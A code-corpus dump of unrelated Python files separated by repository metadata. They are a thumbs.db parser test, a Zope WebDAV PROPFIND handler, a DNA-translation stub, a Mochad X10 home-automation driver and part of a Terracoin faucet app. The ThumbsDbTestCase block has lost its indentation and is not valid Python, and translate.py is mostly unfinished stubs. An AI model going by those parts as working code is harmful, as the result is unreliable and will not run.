            ae(cat.height, 0x07060504)
            ae(cat.item_count, 2)
            ae(cat.entries, entries)
        # end for
    # end def test_from_stream
# end class CatalogTestCase
class ThumbnailTestCase(TestCase):
    """Tests for thumbsdb Thumbnail parsing (both on-disk layouts)."""

    def test_from_stream(self):
        """Thumbnail.from_stream must find the size and the JPEG payload
        in both known record layouts (size at offset 8 or offset 4)."""
        ae = self.assertEqual

        # Layout 1: unknown1, unknown2, size, data.
        data = bytearray()
        data.extend(b"\x00\x01\x02\x03")  # unknown1
        data.extend(b"\x04\x05\x06\x07")  # unknown2
        data.extend(b"\x05\x00\x00\x00")  # size
        data.extend(b"\xFF\xD8\x08\x09\x0A")  # data

        stream = ByteIStream(data)
        thumb1 = Thumbnail.from_stream(stream)
        thumb2 = Thumbnail.from_stream(stream, 0)

        for thumb in (thumb1, thumb2):
            ae(thumb.size, 0x5)
            ae(thumb.data, b"\xFF\xD8\x08\x09\x0A")
        # end for

        # Layout 2: unknown1, size, unknown2, unknown3, data.
        data = bytearray()
        data.extend(b"\x00\x01\x02\x03")  # unknown1
        data.extend(b"\x05\x00\x00\x00")  # size
        data.extend(b"\x04\x05\x06\x07")  # unknown2
        data.extend(b"\x08\x09\x0A\x0B")  # unknown3
        data.extend(b"\xFF\xD8\x0C\x0D\x0E")  # data

        stream = ByteIStream(data)
        thumb1 = Thumbnail.from_stream(stream)
        thumb2 = Thumbnail.from_stream(stream, 0)

        for thumb in (thumb1, thumb2):
            ae(thumb.size, 0x5)
            ae(thumb.data, b"\xFF\xD8\x0C\x0D\x0E")
        # end for
    # end def test_from_stream
# end class ThumbnailTestCase
class ThumbsDbTestCase(TestCase):
def setUp(self):
input_file = join("data", "thumbsdb", "thumbs.db")
self.cfb = CompoundFile(RawIStream(input_file))
self.tdb = ThumbsDb(self.cfb)
# end def setUp
def test__init__(self):
ae = self.assertEqual
ar = self.assertRaises
tdb = self.tdb
catalog_entries = [
CatalogEntry((
0x2E,
1,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"zoolemur1.jpg",
"1"
)),
CatalogEntry((
0x56,
2,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy (2) of danger-sign-shock.jpg",
"2"
)),
CatalogEntry((
0x5E,
3,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Copy (2) of Kookaburra_at_Marwell.jpg",
"3"
)),
CatalogEntry((
0x54,
4,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy (2) of Makari_the_Tiger.jpg",
"4"
)),
CatalogEntry((
0x4A,
5,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy (2) of prairiedogs.jpg",
"5"
)),
CatalogEntry((
0x46,
6,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy (2) of zoolemur1.jpg",
"6"
)),
CatalogEntry((
0x4E,
7,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy of danger-sign-shock.jpg",
"7"
)),
CatalogEntry((
0x56,
8,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Copy of Kookaburra_at_Marwell.jpg",
"8"
)),
CatalogEntry((
0x4C,
9,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy of Makari_the_Tiger.jpg",
"9"
)),
CatalogEntry((
0x42,
10,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy of prairiedogs.jpg",
"01"
)),
CatalogEntry((
0x3E,
11,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy of zoolemur1.jpg",
"11"
)),
CatalogEntry((
0x3E,
12,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"danger-sign-shock.jpg",
"21"
)),
CatalogEntry((
0x46,
13,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Kookaburra_at_Marwell.jpg",
"31"
)),
CatalogEntry((
0x3C,
14,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Makari_the_Tiger.jpg",
"41"
)),
CatalogEntry((
0x32,
15,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"prairiedogs.jpg",
"51"
)),
]
catalog = Catalog((96, 96, 15, catalog_entries))
md5_hashes = {
8: "41783146a36b0df9c0e450715439fa55",
4: "8524c25aab60e2a76ecb3fd1215c52fa",
2: "ca70cbc23a7e39fbeba90f027fef6e5c",
1: "925405772966a6c3bbcedec92c2cb29a",
3: "41783146a36b0df9c0e450715439fa55",
6: "925405772966a6c3bbcedec92c2cb29a",
5: "6bbeb0387e4f44aac21d582a1f2a467d",
7: "ca70cbc23a7e39fbeba90f027fef6e5c",
12: "ca70cbc23a7e39fbeba90f027fef6e5c",
10: "6bbeb0387e4f44aac21d582a1f2a467d",
9: "8524c25aab60e2a76ecb3fd1215c52fa",
11: "925405772966a6c3bbcedec92c2cb29a",
14: "8524c25aab60e2a76ecb3fd1215c52fa",
13: "41783146a36b0df9c0e450715439fa55",
15: "6bbeb0387e4f44aac21d582a1f2a467d"
}
ae(tdb.catalog, catalog)
ae(tdb.thumbnails.keys(), md5_hashes.keys())
for (key, hash) in md5_hashes.items():
ae(md5(tdb.thumbnails[key].data).hexdigest(), hash)
# end for
ar(
KeyError,
ThumbsDb, self.cfb,"thisisnotthecatalogyouarelookingfor"
)
# end def test__init__
# end class ThumbsDbTestCase
|
UTF-8
|
Python
| false | false | 2,010 |
3,006,477,112,975 |
68bc718c9916d668020d8cf25f5a39f01d5073a0
|
153ecce57c94724d2fb16712c216fb15adef0bc4
|
/zope.app.dav/branches/3.5/src/zope/app/dav/propfind.py
|
cecfa87bc6218aeef267e1e0c061b78aab9e1f99
|
[
"ZPL-2.1"
] |
permissive
|
pombredanne/zope
|
https://github.com/pombredanne/zope
|
10572830ba01cbfbad08b4e31451acc9c0653b39
|
c53f5dc4321d5a392ede428ed8d4ecf090aab8d2
|
refs/heads/master
| 2018-03-12T10:53:50.618672 | 2012-11-20T21:47:22 | 2012-11-20T21:47:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""WebDAV method PROPFIND
$Id$
"""
__docformat__ = 'restructuredtext'
from xml.dom import minidom
from xml.parsers import expat
from zope.component import getUtilitiesFor, queryMultiAdapter, queryUtility
from zope.schema import getFieldNamesInOrder, getFields
from zope.container.interfaces import IReadContainer
from zope.app.form.utility import setUpWidgets
from zope.security import proxy
from zope.traversing.browser.absoluteurl import absoluteURL
from interfaces import IDAVWidget, IDAVNamespace
from opaquenamespaces import IDAVOpaqueNamespaces
class PROPFIND(object):
    """PROPFIND handler for all objects.

    Implements the WebDAV PROPFIND method: parses the request body
    (prop / propname / allprop), resolves properties against registered
    IDAVNamespace interfaces and opaque namespaces, and renders a 207
    multistatus XML response, recursing into containers per the Depth
    header. (Python 2 / Zope 3 code.)
    """

    def __init__(self, context, request):
        self.context = context
        self.request = request
        # Depth defaults to 'infinity' per RFC 4918 when the header is absent.
        self.setDepth(request.getHeader('depth', 'infinity'))

        # Split "type/subtype; params" into content type and parameters.
        ct = request.getHeader('content-type', 'text/xml')
        if ';' in ct:
            parts = ct.split(';', 1)
            self.content_type = parts[0].strip().lower()
            self.content_type_params = parts[1].strip()
        else:
            self.content_type = ct.lower()
            self.content_type_params = None

        self.default_ns = 'DAV:'
        self.oprops = IDAVOpaqueNamespaces(self.context, None)
        _avail_props = {}
        # List all *registered* DAV interface namespaces and their properties
        for ns, iface in getUtilitiesFor(IDAVNamespace):
            _avail_props[ns] = getFieldNamesInOrder(iface)
        # List all opaque DAV namespaces and the properties we know of
        if self.oprops:
            for ns, oprops in self.oprops.items():
                _avail_props[ns] = list(oprops.keys())
        self.avail_props = _avail_props

        # The xmldoc attribute will be set later, if needed.
        self.xmldoc = None

    def getDepth(self):
        return self._depth

    def setDepth(self, depth):
        # Normalised to lower case so comparisons against '0'/'1'/'infinity' work.
        self._depth = depth.lower()

    def PROPFIND(self, xmldoc=None):
        """Handle the request and return the multistatus response body.

        `xmldoc` may be passed in by a parent handler during depth
        recursion to avoid re-parsing the request body.
        """
        # Reject unsupported content types and depths with 400 Bad Request.
        if self.content_type not in ['text/xml', 'application/xml']:
            self.request.response.setStatus(400)
            return ''
        if self.getDepth() not in ['0', '1', 'infinity']:
            self.request.response.setStatus(400)
            return ''
        resource_url = absoluteURL(self.context, self.request)
        if IReadContainer.providedBy(self.context):
            resource_url += '/'
        if xmldoc is None:
            try:
                xmldoc = minidom.parse(self.request.bodyStream)
            except expat.ExpatError:
                # An empty/unparsable body means "allprop" (handled below).
                pass
        self.xmldoc = xmldoc

        # Build the <multistatus><response><href>...</href> skeleton.
        resp = minidom.Document()
        ms = resp.createElement('multistatus')
        ms.setAttribute('xmlns', self.default_ns)
        resp.appendChild(ms)
        ms.appendChild(resp.createElement('response'))
        ms.lastChild.appendChild(resp.createElement('href'))
        ms.lastChild.lastChild.appendChild(resp.createTextNode(resource_url))

        if xmldoc is not None:
            propname = xmldoc.getElementsByTagNameNS(
                self.default_ns, 'propname')
            if propname:
                self._handlePropname(resp)
            else:
                source = xmldoc.getElementsByTagNameNS(self.default_ns, 'prop')
                self._handlePropvalues(source, resp)
        else:
            # No body at all: treat as allprop.
            self._handlePropvalues(None, resp)

        self._depthRecurse(ms)

        body = resp.toxml('utf-8')
        self.request.response.setResult(body)
        self.request.response.setStatus(207)
        self.request.response.setHeader('content-type', 'text/xml')
        return body

    def _depthRecurse(self, ms):
        """Append the responses of child objects per the Depth header."""
        depth = self.getDepth()
        if depth == '0' or not IReadContainer.providedBy(self.context):
            return
        # Depth 1 means children at depth 0; infinity stays infinity.
        subdepth = (depth == '1') and '0' or 'infinity'
        for id, obj in self.context.items():
            pfind = queryMultiAdapter((obj, self.request), name='PROPFIND')
            if pfind is None:
                continue
            pfind.setDepth(subdepth)
            value = pfind.PROPFIND(self.xmldoc)
            # Re-parse the child's serialized output and graft its
            # <response> elements into our multistatus element.
            parsed = minidom.parseString(value)
            responses = parsed.getElementsByTagNameNS(
                self.default_ns, 'response')
            for r in responses:
                ms.appendChild(ms.ownerDocument.importNode(r, True))

    def _handleProp(self, source):
        """Collect the explicitly requested properties from a <prop> node.

        Returns {namespace: {'iface': iface-or-None, 'props': [names]}}.
        """
        props = {}
        source = source[0]
        childs = [e for e in source.childNodes
                  if e.nodeType == e.ELEMENT_NODE]
        for node in childs:
            ns = node.namespaceURI
            iface = queryUtility(IDAVNamespace, ns)
            value = props.get(ns, {'iface': iface, 'props': []})
            value['props'].append(node.localName)
            props[ns] = value
        return props

    def _handleAllprop(self):
        """Return every known property in every known namespace."""
        props = {}
        for ns, properties in self.avail_props.items():
            iface = queryUtility(IDAVNamespace, ns)
            props[ns] = {'iface': iface, 'props': properties}
        return props

    def _handlePropname(self, resp):
        """Render a propstat listing only the *names* of all properties."""
        re = resp.lastChild.lastChild
        re.appendChild(resp.createElement('propstat'))
        prop = resp.createElement('prop')
        re.lastChild.appendChild(prop)
        count = 0
        for ns, props in self.avail_props.items():
            # Non-default namespaces get a generated prefix a0, a1, ...
            attr_name = 'a%s' % count
            if ns is not None and ns != self.default_ns:
                count += 1
                prop.setAttribute('xmlns:%s' % attr_name, ns)
            for p in props:
                el = resp.createElement(p)
                prop.appendChild(el)
                if ns is not None and ns != self.default_ns:
                    # NOTE(review): this sets xmlns to the prefix name
                    # (e.g. "a0"), not the namespace URI — looks suspect;
                    # verify against a WebDAV client before changing.
                    el.setAttribute('xmlns', attr_name)
        re.lastChild.appendChild(resp.createElement('status'))
        re.lastChild.lastChild.appendChild(
            resp.createTextNode('HTTP/1.1 200 OK'))

    def _handlePropvalues(self, source, resp):
        """Render property values: allprop if no <prop> element was given."""
        if not source:
            _props = self._handleAllprop()
        else:
            _props = self._handleProp(source)

        avail, not_avail = self._propertyResolver(_props)
        if avail:
            self._renderAvail(avail, resp, _props)
        if not_avail:
            self._renderNotAvail(not_avail, resp)

    def _propertyResolver(self, _props):
        """Split requested properties into available / not-available sets."""
        avail = {}
        not_avail = {}
        for ns in _props.keys():
            iface = _props[ns]['iface']
            for p in _props[ns]['props']:
                if iface is None:
                    # The opaque property case
                    if (self.oprops is not None and
                        self.oprops.get(ns, {}).has_key(p)):
                        l = avail.setdefault(ns, [])
                        l.append(p)
                    else:
                        l = not_avail.setdefault(ns, [])
                        l.append(p)
                    continue

                # The registered namespace case
                adapter = iface(self.context, None)
                if adapter is None:
                    # Registered interface but no adapter? Maybe log this?
                    l = not_avail.setdefault(ns, [])
                    l.append(p)
                    continue

                l = avail.setdefault(ns, [])
                l.append(p)

        return avail, not_avail

    def _renderAvail(self, avail, resp, _props):
        """Render a 200 OK propstat with the values of available properties."""
        re = resp.lastChild.lastChild
        re.appendChild(resp.createElement('propstat'))
        prop = resp.createElement('prop')
        re.lastChild.appendChild(prop)
        re.lastChild.appendChild(resp.createElement('status'))
        re.lastChild.lastChild.appendChild(
            resp.createTextNode('HTTP/1.1 200 OK'))
        count = 0
        for ns, props in avail.items():
            attr_name = 'a%s' % count
            if ns is not None and ns != self.default_ns:
                count += 1
                prop.setAttribute('xmlns:%s' % attr_name, ns)
            iface = _props[ns]['iface']

            if not iface:
                # The opaque properties case, hand it off
                for name in props:
                    self.oprops.renderProperty(ns, attr_name, name, prop)
                continue

            # The registered namespace case: gather current field values
            # and build DAV widgets to serialize them.
            initial = {}
            adapted = iface(self.context)
            for name, field in getFields(iface).items():
                try:
                    value = field.get(adapted)
                except AttributeError:
                    # Interface says the attribute exists but it
                    # couldn't be found on the adapted object.
                    value = field.missing_value
                if value is not field.missing_value:
                    initial[name] = value
            setUpWidgets(self, iface, IDAVWidget, ignoreStickyValues=True,
                         initial=initial, names=initial.keys())

            for p in props:
                el = resp.createElement('%s' % p )
                if ns is not None and ns != self.default_ns:
                    # NOTE(review): same prefix-as-xmlns oddity as in
                    # _handlePropname — confirm intended behavior.
                    el.setAttribute('xmlns', attr_name)
                prop.appendChild(el)
                widget = getattr(self, p + '_widget', None)
                if widget is None:
                    # A widget wasn't generated for this property
                    # because the attribute was missing on the adapted
                    # object, which actually means that the adapter
                    # didn't fully implement the interface ;(
                    el.appendChild(resp.createTextNode(''))
                    continue
                value = widget()

                if isinstance(value, (unicode, str)):
                    # Get the widget value here
                    el.appendChild(resp.createTextNode(value))
                else:
                    if proxy.isinstance(value, minidom.Node):
                        # Widget produced a DOM fragment; import it wholesale.
                        el.appendChild(
                            el.ownerDocument.importNode(value, True))
                    else:
                        # Try to string-ify
                        value = str(widget)
                        # Get the widget value here
                        el.appendChild(resp.createTextNode(value))

    def _renderNotAvail(self, not_avail, resp):
        """Render a 404 Not Found propstat for unavailable properties."""
        re = resp.lastChild.lastChild
        re.appendChild(resp.createElement('propstat'))
        prop = resp.createElement('prop')
        re.lastChild.appendChild(prop)
        re.lastChild.appendChild(resp.createElement('status'))
        re.lastChild.lastChild.appendChild(
            resp.createTextNode('HTTP/1.1 404 Not Found'))
        count = 0
        for ns, props in not_avail.items():
            attr_name = 'a%s' % count
            if ns is not None and ns != self.default_ns:
                count += 1
                prop.setAttribute('xmlns:%s' % attr_name, ns)
            for p in props:
                el = resp.createElement('%s' % p )
                prop.appendChild(el)
                if ns is not None and ns != self.default_ns:
                    el.setAttribute('xmlns', attr_name)
|
UTF-8
|
Python
| false | false | 2,012 |
3,049,426,820,324 |
8bafabec28a5a5f943a09ede760ab17161032348
|
84b28c50477d142d620c9a3d092030ce1a426aeb
|
/lab1/src/translate.py
|
a70dd9dcd04dbb0e909ce63c1ca9e507fdead0d7
|
[] |
no_license
|
brainstorm/biobits
|
https://github.com/brainstorm/biobits
|
5317162e1379ca2e78a16039a64cd7eb40bb1629
|
57b01aec6c54994bd5ec3291c26e9691b8f2b91d
|
refs/heads/master
| 2015-08-06T06:28:04.795328 | 2010-04-06T23:16:04 | 2010-04-06T23:16:04 | 597,797 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
'''
Created on Nov 3, 2009
@author: romanvg
@co-author: hassanfa
Interesting read: http://en.wikipedia.org/wiki/Codon
'''
import re
import read_fasta
# Standard DNA codon -> amino acid (one-letter IUPAC code) translation
# table; the three stop codons map to the literal string 'STOP'.
codon_table= {'ATT':'I','ATC':'I','ATA':'I',
              'CTT':'L','CTC':'L','CTA':'L','CTG':'L','TTA':'L','TTG':'L',
              'GTT':'V','GTC':'V','GTA':'V','GTG':'V',
              'TTT':'F','TTC':'F',
              'ATG':'M',
              'TGT':'C','TGC':'C',
              'GCT':'A','GCC':'A','GCA':'A','GCG':'A',
              'GGT':'G','GGC':'G','GGA':'G','GGG':'G',
              'CCT':'P','CCC':'P','CCA':'P','CCG':'P',
              'ACT':'T','ACC':'T','ACA':'T','ACG':'T',
              'TCT':'S','TCC':'S','TCA':'S','TCG':'S','AGT':'S','AGC':'S',
              'TAT':'Y','TAC':'Y',
              'TGG':'W',
              'CAA':'Q','CAG':'Q',
              'AAT':'N','AAC':'N',
              'CAT':'H','CAC':'H',
              'GAA':'E','GAG':'E',
              'GAT':'D','GAC':'D',
              'AAA':'K','AAG':'K',
              'CGT':'R','CGC':'R','CGA':'R','CGG':'R','AGA':'R','AGG':'R',
              'TAA':'STOP','TAG':'STOP','TGA':'STOP'
              }
def translateDna(file):
    """Dispatch each FASTA record to the handler matching its header key.

    `file` is a {header: sequence} dict as returned by
    read_fasta.read_file().  (The parameter name shadows the ``file``
    builtin but is kept for backward compatibility.)

    Fixes: ``.items()`` instead of the Python-2-only ``.iteritems()``
    (works on both 2 and 3), and a raw string for the regex so ``\\d``
    is not an invalid escape sequence on Python 3.
    """
    for k, v in file.items():
        if k == "stopcodons":
            countStopCodons(v)
        elif k == "ambiguities":
            ambiguities(v)
        elif re.match(r'proteinalphabet\d+', k):
            alphabet(v)
def countStopCodons(codons):
    """Return the number of stop codons in the DNA string `codons`.

    The sequence is scanned codon-by-codon in reading frame 0 (offsets
    0, 3, 6, ...); any trailing partial codon is ignored.

    NOTE(review): the original function was an empty stub; frame-0
    scanning is an assumption — confirm the intended reading frame
    against the exercise description.
    """
    # "amber", "ochre" and "opal" respectively
    stopcodons = ('TAG', 'TAA', 'TGA')
    return sum(1 for i in range(0, len(codons) - 2, 3)
               if codons[i:i + 3] in stopcodons)
def ambiguities(amb):
    # Stub: intended to handle ambiguous bases (IUPAC symbol 'N').
    # `ambig` is assigned but not yet used — implementation pending.
    ambig = "N"
def alphabet(alpha):
    # Stub: handler for 'proteinalphabetN' records; not implemented yet.
    pass
if __name__ == '__main__':
translateDna(read_fasta.read_file("../data/translationtest.dna"))
|
UTF-8
|
Python
| false | false | 2,010 |
19,069,654,832,401 |
897e2a0b5311c0c92cc0a5d894b9d1f81c4daf14
|
e5e28f4069ea4eacc8dd485d95192fe8db17440b
|
/pytomation/interfaces/mochad.py
|
9334813f99c67e2e5e486105006ac41939ad4d01
|
[] |
no_license
|
vesquam/pytomation
|
https://github.com/vesquam/pytomation
|
d0720481e4904cd351f6a6c1fdbb4886adbc8432
|
f0358eb6c7963cc7977b3c570c1d35427ac5b9f5
|
refs/heads/master
| 2021-05-27T22:12:48.020704 | 2014-08-06T04:26:53 | 2014-08-06T04:26:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#from .common import *
#from pytomation.devices import StateDevice, InterfaceDevice, State
from .common import Command
from .ha_interface import HAInterface
from pytomation.devices import State
'''
Mochad Driver Reference:
http://sourceforge.net/apps/mediawiki/mochad/index.php?title=Mochad_Reference
switched pl method for rf as both the cm19a only supports rf while the cm14a
supports both pl and rf
'''
class Mochad(HAInterface):
VERSION = '0.3.0'
    def _init(self, *args, **kwargs):
        """Initialise Mochad-specific parse state, then defer to HAInterface."""
        # Flags tracking which section of a mochad 'st' status dump is
        # currently being parsed (device status vs. security sensor status).
        self._devicestatus = False
        self._securitystatus = False
        super(Mochad, self)._init(*args, **kwargs)
def _readInterface(self, lastPacketHash):
raw_response = self._interface.read()
if len(raw_response) == 0: # if no data leave
return
response_lines = raw_response.split('\n')
self._logger.debug('Number of Lines ' + str(len(response_lines)))
for line in response_lines:
if line.strip() == '':
return # leave if empty
self._logger.debug('line responses> ' + line)
line_data = line.split(' ')
if line_data[2] == 'Rx' or line_data[2] == 'Tx':
""" Like below
01/27 23:41:23 Rx RF HouseUnit: A3 Func: Off
0 1 2 3 4 5 6 7
01/27 23:48:23 Rx RF HouseUnit: A1 Func: On
12/07 20:49:37 Rx RFSEC Addr: C6:1B:00 Func: Motion_alert_MS10A
0 1 2 3 4 5 6 7
06/06 21:08:56 Tx PL HouseUnit: A2
06/06 21:08:56 Tx PL House: A Func: Off
"""
#date=data[0]
#time=data[1]
#direction=data[2]
#method=data[3]
#ua=data[4]
addr = line_data[5]
# removing _devicemodel
func = line_data[7].strip().rsplit('_', 1)[0]
self._map(func, addr)
"""
command sent > st
02/01 16:44:23 Device selected
02/01 16:44:23 House A: 2
02/01 16:44:23 House B: 1
02/01 16:44:23 Device status
02/01 16:44:23 House A: 1=0,2=0,3=0,4=1,5=1,6=1,7=1,8=1,10=0,11=0
0 1 2 3 4
02/01 16:44:23 Security sensor status
02/01 16:44:23 Sensor addr: 000003 Last: 1102:40 Arm_KR10A
02/01 16:44:23 Sensor addr: 000093 Last: 1066:33 Disarm_SH624
02/01 16:44:23 Sensor addr: 055780 Last: 1049:59 Contact_alert_max_
02/01 16:44:23 Sensor addr: 27B380 Last: 01:42 Motion_normal_MS10A
02/01 16:44:23 Sensor addr: AF1E00 Last: 238:19 Lights_Off_KR10A
0 1 2 3 4 5 6 7
02/01 16:44:23 End status
"""
if line_data[2] == 'Device':
if line_data[3] == 'status':
self._devicestatus = True
continue
if line_data[2] == 'Security':
if line_data[3] == 'sensor':
self._devicestatus = False
self._securitystatus = True
continue
if line_data[2] == 'End':
self._devicestatus = False # Forcing false
self._securitystatus = False
continue
if self._devicestatus:
housecode = line_data[3].strip(":")
for device in line_data[4].split(','):
qdevicestatus = device.split('=')
if qdevicestatus[1] == '0':
self._onCommand(command=Command.OFF,
address=str(housecode
+ qdevicestatus[0]))
if qdevicestatus[1] == '1':
self._onCommand(command=Command.ON,
address=str(housecode
+ qdevicestatus[0]))
if self._securitystatus:
addr = line_data[4]
func = line_data[7].rsplit('_', 1)[0]
self._logger.debug(
"Function: " + func
+ " Address "
+ addr[0:2]
+ ":" + addr[2:4]
+ ":" + addr[4:6])
# adding in COLONs
self._map(func,
addr[0:2] + ":" + addr[2:4] + ":" + addr[4:6])
def status(self, address):
self._logger.debug('Querying of last known status '
+ ' of all devices including '
+ address)
self._interface.write('st' + "\x0D")
return None
def update_status(self):
self._logger.debug('Mochad update status called')
self.status('')
def _onCommand(self, command=None, address=None):
commands = command.split(' ')
if commands[0] == 'rf':
address = commands[1]
command = commands[2][0:len(commands[2]) - 1]
self._logger.debug('Command>' + command + ' at ' + address)
super(Mochad, self)._onCommand(command=command, address=address)
""" #Causes issues with web interface Disabling this feature.
def __getattr__(self, command):
return lambda address: self._interface.write(
'rf ' + address + ' ' + command + "\x0D" )
"""
def on(self, address):
self._logger.debug('Command on at ' + address)
self._interface.write('rf ' + address + ' on' + "\x0D")
def off(self, address):
self._logger.debug('Command off at ' + address)
self._interface.write('rf ' + address + ' off' + "\x0D")
def disarm(self, address):
self._logger.debug('Command disarm at ' + address)
self._interface.write('rfsec ' + address + ' disarm' + "\x0D")
def arm(self, address):
self._logger.debug('Command arm at ' + address)
self._interface.write('rfsec ' + address + ' arm' + "\x0D")
def version(self):
self._logger.info("Mochad Pytomation Driver version " + self.VERSION)
def _map(self, func, addr): # mapping output to a valid command
if func == "On":
self._onCommand(command=Command.ON, address=addr)
elif func == "Off":
self._onCommand(command=Command.OFF, address=addr)
elif func == "Contact_normal_min":
self._onState(state=State.CLOSED, address=addr)
elif func == "Contact_alert_min":
self._onState(state=State.OPEN, address=addr)
elif func == "Contact_normal_max":
self._onState(state=State.CLOSED, address=addr)
elif func == "Contact_alert_max":
self._onState(state=State.OPEN, address=addr)
elif func == "Motion_alert":
self._onState(state=State.MOTION, address=addr)
elif func == "Motion_normal":
self._onState(state=State.STILL, address=addr)
# TODO: Add security states.
#elif func == "Arm":
# self._onState(state=State.ON, address=addr)
#elif func == "Panic":
# self._onState(state=State.VACATE, address=addr)
#elif func == "Disarm":
# self._onState(state=State.DISARM, address=addr)
#elif func == "Lights_On":
# self._onCommand(command=Command.ON, address=addr)
#elif func == "Lights_Off":
# self._onCommand(command=Command.OFF, address=addr)
|
UTF-8
|
Python
| false | false | 2,014 |
3,513,283,249,066 |
94d1d5c2deaf40f6a221452d737ea8c0c3693425
|
01481aadcc6df89b2493969a1cd226e6cb5d68a7
|
/CryptoTap.py
|
adfa80a34a485c266545238aaa9128d71c6a8600
|
[] |
no_license
|
techtronics/trcfaucet
|
https://github.com/techtronics/trcfaucet
|
487d394e79febbb1afae83367588a515338b6450
|
463b3d69b40c206acdecf25c0d087b774a80bf52
|
refs/heads/master
| 2018-01-13T20:05:17.223616 | 2013-09-25T00:05:49 | 2013-09-25T00:05:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import sys
import sqlite3
import hashlib
from random import randint
from datetime import datetime
from flask import g
from flask import Flask
from flask import url_for
from flask import request
from flask import redirect
from flask import render_template
from contextlib import closing
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler
# Load Flask -------------------------------------------------------------------
app = Flask(__name__)
# All tunables (DATABASE_FILE, MAX_DRIPS, REQUEST_TIME_LIMIT, COIN_NAME,
# BLOCK_EXPLORER_URL, ...) are read from settings.cfg next to this module.
app.config.from_pyfile('settings.cfg')
# Database Functions -----------------------------------------------------------
def connect_db():
    """Open a new SQLite connection to the faucet database."""
    return sqlite3.connect(app.config['DATABASE_FILE'])

@app.before_request
def before_request():
    # One connection per request, stored on Flask's per-request `g` object.
    g.db = connect_db()

@app.teardown_request
def teardown_request(exception):
    # Close the per-request connection, if one was opened.
    if hasattr(g, 'db'):
        g.db.close()

def init_db():
    """Create the schema by executing the SQL script named by DATABASE_INIT."""
    with closing(connect_db()) as db:
        with app.open_resource(app.config['DATABASE_INIT'], mode='r') as f:
            db.cursor().executescript(f.read())
        db.commit()
# Affiliate System -------------------------------------------------------------
class Affiliate:
    """Affiliate system stub -- not implemented yet."""
    def __init__(self):
        pass

# API System -------------------------------------------------------------------
class API:
    """API system stub -- not implemented yet."""
    def __init__(self):
        pass
# Classes ----------------------------------------------------------------------
class DripRequest:
    """
    Stores a user's terracoin send request.

    Data Members:
    address -- Terracoin address to send the transaction to.
    coupon -- Special code that allows users to get additional coins.
    ip -- The IP address that the request was made from.
    drip_id -- The database id of the drip request.
    """
    # Magics -------------------------------------------------------------------
    def __init__(self, address, coupon, ip, drip_id = 0):
        """Validate all input, then store it (coupon is upper-cased).

        Raises ValueError for a bad address or IP; an invalid coupon is
        replaced with the literal 'INVALID' rather than raising.
        """
        if not self.validate_address(address):
            errmsg = 'Invalid {0} Address'.format(app.config['COIN_NAME'])
            raise ValueError(errmsg)
        # Bug fix: these checks used to be an if/elif chain, so an invalid
        # coupon silently skipped the IP validation entirely. Each input is
        # now validated independently.
        if not self.validate_coupon(coupon):
            coupon = 'INVALID'
        if not self.validate_ip(ip):
            raise ValueError('Invalid IP')
        # Cast everything
        self.address = str(address)
        self.coupon = str(coupon).upper()
        self.ip = str(ip)
        self.drip_id = int(drip_id)

    def __str__(self):
        """Object to string for easy debugging."""
        text = '{0} {1} {2} {3}'
        return text.format(self.address, self.coupon, self.ip, self.drip_id)

    # Validation and Clean Functions -------------------------------------------
    def clean(self, in_str):
        """Strips out chars that are not alphanumeric."""
        pattern = re.compile(r'[\W_]+')
        return pattern.sub('', str(in_str))

    def validate_address(self, address):
        """
        Does simple validation of a bitcoin-like address.
        Source: http://bit.ly/17OhFP5
        param : address : an ASCII or unicode string, of a bitcoin address.
        returns : boolean, indicating that the address has a correct format.
        """
        address = self.clean(address)
        # The first character indicates the "version" of the address.
        CHARS_OK_FIRST = "123"
        # alphanumeric characters without : l I O 0
        CHARS_OK = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
        # We do not check the high length limit of the address.
        # Usually, it is 35, but nobody knows what could happen in the future.
        if len(address) < 27:
            return False
        elif address[0] not in CHARS_OK_FIRST:
            return False
        # Lazy generator: stops at the first invalid character.
        return all((char in CHARS_OK for char in address[1:]))

    def validate_coupon(self, coupon):
        """Makes sure the coupon is alphanumeric and less than 12 chars."""
        coupon = self.clean(coupon)
        return re.match(r'^[\w]+$', coupon) and len(coupon) < 12

    def validate_ip(self, ip):
        """Checks for a valid IPv4 dotted-quad address."""
        return re.match(r'([0-9]{1,3}\.){3}[0-9]+', str(ip))

    # Database Methods ---------------------------------------------------------
    def count_unique(self, row, val):
        """Count drip requests matching the given 'ip' or 'address' value."""
        if row == 'ip':
            query = "SELECT Count(*) FROM drip_request WHERE ip=?"
        elif row == 'address':
            query = "SELECT Count(*) FROM drip_request WHERE address=?"
        cur = g.db.execute(query, (val,))
        return int(cur.fetchone()[0])

    def last_request(self, val):
        """Return the number of minutes since the last drip request.

        Bug fix: the module-level helper's result used to be computed and
        discarded, so this method always returned None; it is now returned.
        """
        return last_request(val)

